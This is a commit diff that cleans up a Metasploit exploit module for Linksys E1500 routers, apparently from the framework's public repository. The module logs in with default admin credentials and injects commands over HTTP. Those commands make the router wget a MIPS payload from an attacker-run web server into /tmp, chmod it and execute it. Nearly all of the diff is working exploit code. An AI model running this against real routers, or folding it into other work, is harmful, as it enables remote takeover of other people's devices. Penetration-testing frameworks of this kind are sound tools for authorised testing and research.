little cleanup for e1500_up_exec

jvazquez-r7 · jvazquez-r7 · commit 607b1c5c143d · 2013-03-29T23:16:13.000+01:00
diff --git a/modules/exploits/linux/http/linksys_e1500_up_exec.rb b/modules/exploits/linux/http/linksys_e1500_up_exec.rb
@@ -32,37 +32,32 @@ def initialize(info = {})
 				],
 			'DisclosureDate' => 'Feb 05 2013',
 			'Privileged'  => true,
-			'Platform'       => [ 'unix', 'linux', ],
-			'Arch'           => [ ARCH_MIPSLE, ARCH_CMD],
+			'Platform'       => ['linux','unix'],
+			#'Arch'           => ARCH_MIPSLE,
+			'Payload'        =>
+				{
+					'DisableNops' => true
+				},
 			'Targets'        =>
 			[
 				[ 'CMD',
 					{
 					'Arch' => ARCH_CMD,
-					'Platform' => 'unix',
+					'Platform' => 'unix'
 					}
 				],
 				[ 'Linux Mipsel Payload',
 					{
 					'Arch' => ARCH_MIPSLE,
-					'Platform' => 'linux',
+					'Platform' => 'linux'
 					}
 				],
 			],
-			#'Payload'        =>
-			#	{
-			#	'Compat'   =>
-			#		{
-			#		'PayloadType' => 'cmd mipsle',
-			#		'RequiredCmd' => 'generic shell_bind_tcp shell_reverse_tcp'
-			#		},
-			#},
 			'DefaultTarget'  => 1,
 			))
 
 		register_options(
 			[
-				Opt::RPORT(80),
 				OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
 				OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]),
 				OptString.new('DOWNHOST',  [ false, 'The host to request the MIPS payload from' ]),
@@ -91,13 +86,11 @@ def request(cmd,user,pass,uri)
 				}
 			})
 
-			if (! res)
-				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload [No Response]")
-			end
+			return res
 
 		rescue ::Rex::ConnectionError
 			vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
-			return
+			return nil
 		end
 	end
 
@@ -138,71 +131,86 @@ def exploit
 		end
 
 		if target.name =~ /CMD/
-
+			if not (datastore['CMD'])
+				fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
+			end
 			cmd = payload.encoded
-			request(cmd,user,pass,uri)
+			res = request(cmd,user,pass,uri)
+			if (!res)
+				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+			end
+			return
+		end
 
-		else
-			#thx to Juan for his awesome work on the mipsel payloads
-			@pl = generate_payload_exe
 
-			#
-			# start our server
-			#
-			resource_uri = '/' + downfile
+		#thx to Juan for his awesome work on the mipsel payloads
+		@pl = generate_payload_exe
 
-			if (datastore['DOWNHOST'])
-				service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
-			else
-				#do not use SSL ;)
-				if datastore['SSL']
-					ssl_restore = true
-					datastore['SSL'] = false
-				end
-
-				service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
-				print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
-				start_service({'Uri' => {
-					'Proc' => Proc.new { |cli, req|
-						on_request_uri(cli, req)
-					},
-					'Path' => resource_uri
-				}})
-
-				datastore['SSL'] = true if ssl_restore
+		#
+		# start our server
+		#
+		resource_uri = '/' + downfile
+
+		if (datastore['DOWNHOST'])
+			service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
+		else
+			#do not use SSL ;)
+			if datastore['SSL']
+				ssl_restore = true
+				datastore['SSL'] = false
 			end
 
-			print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")
+			service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
+			print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
+			start_service({'Uri' => {
+				'Proc' => Proc.new { |cli, req|
+					on_request_uri(cli, req)
+				},
+				'Path' => resource_uri
+			}})
+
+			datastore['SSL'] = true if ssl_restore
+		end
 
-			#this filename is used to store the payload on the device
-			filename = rand_text_alpha_lower(8)
-			register_file_for_cleanup("/tmp/#{filename}")
+		print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")
 
-			#not working if we send all command together -> lets take three requests
-			cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
+		#this filename is used to store the payload on the device
+		filename = rand_text_alpha_lower(8)
 
-			request(cmd,user,pass,uri)
+		#not working if we send all command together -> lets take three requests
+		cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
 
-			#
-			# chmod
-			#
+		res = request(cmd,user,pass,uri)
+		if (!res)
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
+		end
+		register_file_for_cleanup("/tmp/#{filename}")
 
-			cmd = "chmod 777 /tmp/#{filename}"
+		#
+		# chmod
+		#
 
-			print_status("#{rhost}:#{rport} - Asking the Linksys device to prepare #{downfile}")
+		cmd = "chmod 777 /tmp/#{filename}"
 
-			request(cmd,user,pass,uri)
+		print_status("#{rhost}:#{rport} - Asking the Linksys device to prepare #{downfile}")
 
-			#
-			# execute
-			#
+		res = request(cmd,user,pass,uri)
+		if (!res)
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
+		end
+
+
+		#
+		# execute
+		#
 
-			cmd = "/tmp/#{filename}"
+		cmd = "/tmp/#{filename}"
 
-			print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
+		print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
 
-			request(cmd,user,pass,uri)
-			stop_service
+		res = request(cmd,user,pass,uri)
+		if (!res)
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
 		end
 
 	end
